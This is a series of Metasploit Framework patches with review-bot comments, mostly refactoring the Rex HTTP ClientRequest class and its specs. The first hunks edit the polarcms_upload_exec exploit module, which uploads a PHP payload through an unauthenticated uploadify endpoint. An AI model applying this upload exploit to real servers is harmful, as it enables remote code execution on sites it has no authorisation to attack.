@@ -71,11 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - - upload_dir = datastore['UPLOADDIR'] - upload_dir << '/' if upload_dir[-1,1] != '/' - + + upload_dir = normalize_uri("#{datastore['UPLOADDIR']}/") + peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" @@ -83,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") - data.add_part("#{uri}includes/jquery.uploadify/", nil, nil, "form-data; name=\"folder\"") + data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}includes/jquery.uploadify/upload.php?folder=#{upload_dir}", + 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) From 08275e8d83e7709683f0ab676387713e963d356e Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 19:48:39 -0600 Subject: [PATCH 087/139] Process.spawn instead of system Per @bturner-r7's comment here: https://github.com/rapid7/metasploit-framework/pull/1514#discussion_r3129535 --- lib/msf/ui/console/command_dispatcher/core.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d180c7521e..c13fc46f88 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
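Review bot: In the rewritten `send_request_cgi` call, the query string `upload.php?folder=#{upload_dir}` is handed to `normalize_uri` as if it were a path segment, so the `folder` value is neither separated from the path nor URL-encoded, and any slash normalisation the helper performs is applied to the query as well. The HTTP mixin already supports query parameters as data, so `'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', 'upload.php')` together with `'vars_get' => { 'folder' => upload_dir }` expresses the intent and lets the client encode the value. The `exploit` method continues past the end of the hunk.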
@@ -2653,7 +2653,9 @@ class Core # # Go_pro methods -- these are used to start and connect to # Metasploit Community / Pro. + # + # Note that this presumes a default port. def launch_metasploit_browser cmd = "/usr/bin/xdg-open" unless ::File.executable_real? cmd @@ -2677,7 +2679,8 @@ class Core print_good "If this is your first time connecting, you will be presented with" print_good "a self-signed certificate warning. Accept it to create a new user." select(nil,nil,nil,7) - system(cmd, "https://localhost:3790") + browser_pid = ::Process.spawn(cmd, "https://localhost:3790") + ::Process.detach(browser_pid) elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time. print_line print_warning "For some reason, Community / Pro didn't start in a timely fashion." From abdcde06cd20f87eef9ab3837461e2789e568c67 Mon Sep 17 00:00:00 2001 From: Joe Rozner Date: Mon, 25 Feb 2013 22:58:26 -0800 Subject: [PATCH 088/139] Fix polarcms_upload_exec exploit --- modules/exploits/multi/http/polarcms_upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index a45cecfd06..b3dc7c338f 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") - data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"") + data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")) post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ From c104fa6d979b1eca2bdc960df67544bfb848ed65 Mon Sep 17 00:00:00 2001 
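Review bot: The closing parenthesis on the corrected `data.add_part` line is misplaced: `normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")` now receives the MIME arguments as extra path segments and `add_part` receives a single argument, so the multipart `folder` part is still not built as intended. The call should close `normalize_uri` after the path segments, `data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/'), nil, nil, "form-data; name=\"folder\"")`. The enclosing `exploit` method starts and ends outside the hunk.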
From: David Maloney Date: Tue, 26 Feb 2013 11:01:16 -0600 Subject: [PATCH 089/139] Add spec and a few fixes for set_uri --- lib/rex/proto/http/client.rb | 4 +- lib/rex/proto/http/client_request.rb | 14 +- .../lib/rex/proto/http/client_request_spec.rb | 184 ++++++++++++++++++ 3 files changed, 195 insertions(+), 7 deletions(-) create mode 100644 spec/lib/rex/proto/http/client_request_spec.rb diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..22ace0507e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -179,7 +179,8 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -222,6 +223,7 @@ class Client opts['vars_get'] ||= {} opts['vars_post'] ||= {} + opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..b5fc283ac8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -26,6 +26,7 @@ class ClientRequest attr_accessor :protocol attr_accessor :query attr_accessor :raw_headers + attr_accessor :ssl attr_accessor :uri attr_accessor :user_agent attr_accessor :vars_get @@ -36,7 +37,7 @@ class ClientRequest def initialize(opts={}) @cgi = opts['cgi'] - @config = opts['client_config'] + @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @@ -50,6 +51,7 @@ class ClientRequest @port = opts['port'] @protocol = opts['proto'] @query = opts['query'] + @ssl = opts['ssl'] || false @raw_headers = opts['raw_headers'] @uri = opts['uri'] @user_agent = opts['agent'] 
@@ -160,7 +162,7 @@ class ClientRequest end def set_uri - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -179,7 +181,7 @@ class ClientRequest end if (config['uri_full_url']) - url = self.ssl ? "https" : "http" + url = self.ssl ? "https://" : "http://" url << self.config['vhost'] url << ((self.port == 80) ? "" : ":#{self.port}") url << uri_str @@ -190,7 +192,7 @@ class ClientRequest end def set_cgi - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -221,7 +223,7 @@ class ClientRequest end def set_encode_uri(str) - a = str + a = str.dup config['uri_encode_count'].times { a = Rex::Text.uri_encode(a, config['uri_encode_mode']) } @@ -229,7 +231,7 @@ class ClientRequest end def set_method - ret = method + ret = method.dup if (config['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb new file mode 100644 index 0000000000..894b5d9792 --- /dev/null +++ b/spec/lib/rex/proto/http/client_request_spec.rb 
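Review bot: In the `uri_full_url` branch of `set_uri`, the port is dropped only when it equals 80, so an SSL request on 443 renders as `https://host:443/...`, and `self.config['vhost']` is appended as-is, so an IPv6 literal is not bracketed — both differ from `set_host_header`, which treats 80 and 443 as default ports and brackets IPv6 hosts. Consider `url << ((self.port == (self.ssl ? 443 : 80)) ? "" : ":#{self.port}")` and applying the same bracket check the Host header uses. Separately, `uri_str = uri.dup` presumes `uri` is a String, but `@uri = opts['uri']` is given no default in `initialize`, so a request built without a 'uri' would raise here rather than default to `/` — worth a `|| '/'` in the constructor. `set_uri` ends outside the hunk.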
@@ -0,0 +1,184 @@ +require 'spec_helper' + +require 'rex/proto/http/client_request' + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.config['uri_dir_self_reference'] = true + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" + end + end +end + +shared_context "with no evasions" do + before(:all) do + client_request.config['uri_dir_self_reference'] = false + client_request.config['uri_fake_params_start'] = false + client_request.config['uri_full_url'] = false + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" + end + end +end + +shared_context "with 'uri_full_url'" do + + before(:all) do + client_request.config['uri_full_url'] = true + end + + before(:each) do + client_request.config['vhost'] = host + end + + context "with ipv4 host" do + let(:host) { '192.0.2.1' } + + it_behaves_like "uri_full_url" + end + + context "with ipv6 host" do + let(:host) { '2001:DB8::1' } + #before(:each) do + # client_request.config['vhost'] = "[#{host}]" + #end + + it_behaves_like "uri_full_url" + end + + context "with dns host" do + let(:host) { 'www.example.com' } + + it_behaves_like "uri_full_url" + end + +end + +shared_examples "uri_full_url" do + + it "should have the host in the URI" do + client_request.send(:set_uri).should start_with("http://#{host}/") + end + +end + + +describe Rex::Proto::Http::ClientRequest do + + default_options = { + # All of these should be what you get when you pass in empty + # options, but of course that would make it too easy + 'uri' => '/', + 'method' => "GET", + 'proto' => "HTTP", + 'connection' => "close", + 'version' => "1.1", + 'port' => 80, + } + + [ + [ "with reasonable default options", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + # Yes, vhost is in the config. There is no godly reason why this + # should be so. 
+ 'client_config' => { 'vhost' => 'www.example.com', }, + }), + { + :set_cgi => { :result => "/" }, + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_uri_prepend => { :result => "" }, + :set_uri_append => { :result => "" }, + :set_agent_header => { :result => "User-Agent: Mozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_host_header => { :result => "Host: www.example.com\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo: Bar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo: Bar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo: Bar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, + } + ], + + [ "with header folding", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + 'client_config' => { 'header_folding' => true, } + }), + { + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_agent_header => { :result => "User-Agent:\r\n\tMozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_cookie_header => { :result => "" }, + :set_connection_header => { :result => "Connection:\r\n\tclose\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo:\r\n\tBar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, + } + ], + + [ "with ipv6 host", + default_options.merge({ + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, + } + ], + + [ "with ipv6 host and 
non-default port", + default_options.merge({ + 'port' => 1234, + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, + } + ] + ].each do |c, opts, expectations| + context c do + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } + + expectations.each do |meth, things| + args = things[:args] || [] + result = things[:result] + describe "##{meth}" do + it "should return #{result.inspect}" do + client_request.send(meth, *args).should == result + end + end + end + + end + end + + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } + + context "with GET paramaters" do + subject(:client_request) { + options_with_params = default_options.merge({ + 'vars_get' => { + 'foo[]' => 'bar', + 'foo[]' => 'baz', + } + }) + Rex::Proto::Http::ClientRequest.new(options_with_params) + } + end + + describe "#set_uri" do + it_behaves_like "with 'uri_full_url'" + it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with no evasions" + end + +end \ No newline at end of file From cae030ccd72bf7065eb9c204cec47fc8fc35258c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:25:37 -0600 Subject: [PATCH 090/139] Whitespace --- .../lib/rex/proto/http/client_request_spec.rb | 86 ++++++++++--------- 1 file changed, 46 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 894b5d9792..c5ac25a5ca 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb 
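Review bot: The `expectations` hashes in the example table repeat the `:set_formatted_header` key four times in a single literal, and Ruby keeps only the last duplicate (with a "duplicated key" warning), so three of the four header-formatting cases are never executed in either the default-options or the header-folding context. Turn the value into a list, e.g. `:set_formatted_header => [ { :args => ["Foo", "Bar"], :result => "Foo: Bar\r\n" }, ... ]`, and iterate `Array(things).each` inside the `expectations.each` loop so every case gets its own example. The `before(:all)` hooks in the shared contexts also assign through `client_request`, which is a per-example `subject`; whether those config changes reach the examples as intended depends on the RSpec version and is worth confirming.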
@@ -1,77 +1,77 @@ require 'spec_helper' - + require 'rex/proto/http/client_request' - + shared_context "with 'uri_dir_self_reference'" do before(:all) do client_request.config['uri_dir_self_reference'] = true end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/./" end end end - + shared_context "with no evasions" do before(:all) do client_request.config['uri_dir_self_reference'] = false client_request.config['uri_fake_params_start'] = false client_request.config['uri_full_url'] = false end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/" end end end - + shared_context "with 'uri_full_url'" do - + before(:all) do client_request.config['uri_full_url'] = true end - + before(:each) do client_request.config['vhost'] = host end - + context "with ipv4 host" do let(:host) { '192.0.2.1' } - + it_behaves_like "uri_full_url" end - + context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do # client_request.config['vhost'] = "[#{host}]" #end - + it_behaves_like "uri_full_url" end - + context "with dns host" do let(:host) { 'www.example.com' } - + it_behaves_like "uri_full_url" end - + end - + shared_examples "uri_full_url" do - + it "should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end - + end - - + + describe Rex::Proto::Http::ClientRequest do - + default_options = { # All of these should be what you get when you pass in empty # options, but of course that would make it too easy 
@@ -82,16 +82,16 @@ describe Rex::Proto::Http::ClientRequest do 'version' => "1.1", 'port' => 80, } - - [ + + [ [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", # Yes, vhost is in the config. There is no godly reason why this - # should be so. + # should be so. 'client_config' => { 'vhost' => 'www.example.com', }, }), - { + { :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, @@ -106,13 +106,13 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, } ], - + [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", 'client_config' => { 'header_folding' => true, } }), - { + { :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -125,29 +125,29 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, } ], - + [ "with ipv6 host", default_options.merge({ 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, } ], - + [ "with ipv6 host and non-default port", default_options.merge({ - 'port' => 1234, + 'port' => 1234, 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, } ] ].each do |c, opts, expectations| context c do subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } - + expectations.each do |meth, things| args = things[:args] || [] result = things[:result] 
@@ -157,28 +157,34 @@ describe Rex::Proto::Http::ClientRequest do end end end - + end end - + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } - + context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ + 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', + 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + + it "should contain the params" do + client_request.to_s.should contain("foo[]=bar") + client_request.to_s.should contain("foo[]=baz") + end end - + describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" it_behaves_like "with no evasions" end - -end \ No newline at end of file + +end From 7b3a11f2f99213c00a12c0a8c165d26852ce296b Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:28:44 -0600 Subject: [PATCH 091/139] Axe tests that belong in client_request_spec --- spec/lib/rex/proto/http/client_spec.rb | 90 -------------------------- 1 file changed, 90 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 937130a1f4..0105b11136 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
@@ -121,96 +121,6 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) do - - end - - it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) do - - end - - # These set_ methods all exercise the evasion opts, looks like - - it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - - end - - it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do - - end - - it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) do - - end - - it "should set and return the version string", :pending => excuse_lazy(:set_version) do - - end - - it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) do - - end - - it "should set and return the path", :pending => excuse_lazy(:set_path_info) do - - end - - it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) do - - end - - it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) do - - end - - it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) do - - end - - it "should set and return padding after the URI" do - @cli.set_uri_append.should be_empty - end - - it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do - - end - - it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) do - - end - - it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) do - - end - - it "should set and return the basic authentication header", 
:pending => excuse_lazy(:set_basic_auth_header) do - - end - - it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) do - - end - - it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) do - - end - - it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" do - - end - - it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) do - - end - it "should respond to its various accessors" do @cli.should respond_to :config @cli.should respond_to :config_types From 5e0161d3f748e058233799567f6c3b7351ee6539 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:31:24 -0600 Subject: [PATCH 092/139] Reflect new ClientRequst in docs --- lib/rex/proto/http/client.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 928cbf4b4b..8bb69f2735 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -167,7 +167,7 @@ class Client # @option opts 'version' [String] version of the protocol, default: 1.1 # @option opts 'vhost' [String] Host header value # - # @return [Request] + # @return [ClientRequest] def request_raw(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -206,7 +206,7 @@ class Client # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data # - # @return [Request] + # @return [ClientRequest] def request_cgi(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -322,7 +322,7 @@ class Client # # Send an HTTP request to the server # - # @param req [Request,#to_s] The request to send + # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # def send_request(req, t = -1) 
@@ -333,6 +333,7 @@ class Client # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object + # # @param res [Response] the HTTP Response object # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds From 764bbbb8e5a8068a2bd100199b40e36f3895d0d5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:19 -0600 Subject: [PATCH 093/139] Whitespace --- lib/rex/proto/http/client_request.rb | 42 ++++++++++++++-------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 26592be1ca..2722483200 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb 
@@ -36,28 +36,28 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] - @config = opts['client_config'] || {} - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] - @encode = opts['encode'] + @cgi = opts['cgi'] + @config = opts['client_config'] || {} + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] - @host = opts['vhost'] - @method = opts['method'] - @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] - @version = opts['version'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] @opts = opts end From d463460da7ff12e3bc5a62cd71662bb21c26721c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:54 -0600 Subject: [PATCH 094/139] Default cgi to true when not given --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2722483200..69c24d7a95 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb 
@@ -36,7 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] + @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] From c206ac4998f1b066f366d26159afff1d1aa21c07 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:15:51 -0600 Subject: [PATCH 095/139] Set some reasonable defaults Fixes a number of nil deref issues --- lib/rex/proto/http/client_request.rb | 20 ++++++++++--------- .../lib/rex/proto/http/client_request_spec.rb | 4 ++-- 2 files changed, 13 insertions(+), 11 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 69c24d7a95..c73144c2bb 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,29 +36,31 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] - @data = opts['data'] + @data = opts['data'] || "" @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] + @headers = opts['headers'] || {} @host = opts['vhost'] - @method = opts['method'] + @method = opts['method'] || "GET" @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] + @port = opts['port'] || 80 + @protocol = opts['proto'] || "HTTP" + @query = opts['query'] || "" + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] @opts = opts + + config['chunked_size'] ||= 0 + config['pad_method_uri_count'] ||= 1 end def to_s 
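Review bot: `config['chunked_size'] ||= 0` and `config['pad_method_uri_count'] ||= 1` write into `@config`, which is the same `opts['client_config']` hash the caller supplied, so constructing a request now mutates the client's shared config as a side effect. If that is not intended, copy it on entry (`@config = (opts['client_config'] || {}).dup`) or apply the fallback at the read sites (`config['chunked_size'] || 0`). The hunk also removes the `@cgi` assignment without a replacement, leaving `@cgi` nil for every request built through this constructor; a later commit on this page reinstates it. `initialize` is shown in full, but `to_s` begins after the hunk.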
diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index c5ac25a5ca..1dba9ca48d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -176,8 +176,8 @@ describe Rex::Proto::Http::ClientRequest do } it "should contain the params" do - client_request.to_s.should contain("foo[]=bar") - client_request.to_s.should contain("foo[]=baz") + client_request.to_s.should include("foo[]=bar") + client_request.to_s.should include("foo[]=baz") end end From d7de3b75a43975ae2cb898bb8cf1b71737811924 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:18:20 -0600 Subject: [PATCH 096/139] Format Authorization header like others Also sorts the set_*_header methods --- lib/rex/proto/http/client_request.rb | 61 +++++++++++++--------------- 1 file changed, 29 insertions(+), 32 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c73144c2bb..efc6e2b95c 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -142,10 +142,7 @@ class ClientRequest req << set_agent_header end - if authorization - req << set_auth_header - end - + req << set_auth_header req << set_cookie_header req << set_connection_header req << set_extra_headers @@ -159,10 +156,6 @@ class ClientRequest protected - def set_auth_header - "Authorization: " + authorization - end - def set_uri uri_str = uri.dup if (config['uri_dir_self_reference']) 
@@ -347,23 +340,14 @@ class ClientRequest end # - # Return the HTTP Host header + # Return a formatted header string # - def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" end - - # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) end # @@ -373,15 +357,8 @@ class ClientRequest user_agent ? set_formatted_header("User-Agent", user_agent) : "" end - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end + def set_auth_header + authorization ? set_formatted_header("Authorization", authorization) : "" end # @@ -412,6 +389,26 @@ class ClientRequest set_formatted_header("Content-Length", clen) end + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + # # Return a string of formatted extra headers # From 579c11bc690573c15f01413b875f212461419fcf Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:25:39 -0600 Subject: [PATCH 097/139] Set reasonable defaults for more things All current tests are passing now --- lib/rex/proto/http/client_request.rb | 5 +++-- spec/lib/rex/proto/http/client_request_spec.rb | 2 -- 2 files changed, 3 insertions(+), 4 deletions(-) 
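Review bot: In the relocated `set_host_header`, `host ||= config['vhost']` turns `host` into a local variable from that line onward (initialised to nil), so the `host` accessor — and the `@host = opts['vhost']` set in `initialize` — is never consulted and the header always comes from `config['vhost']`. If that is deliberate, write `host = config['vhost']` so the intent is explicit; otherwise `host = self.host || config['vhost']`. The `[80,443].include?(port)` check also omits `:443` for a plain-HTTP request on 443 and emits `:80` for an HTTPS request on 80; now that the request carries an `ssl` flag, comparing against `ssl ? 443 : 80` would be more precise. The methods in these hunks are complete, but the surrounding class continues outside them.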
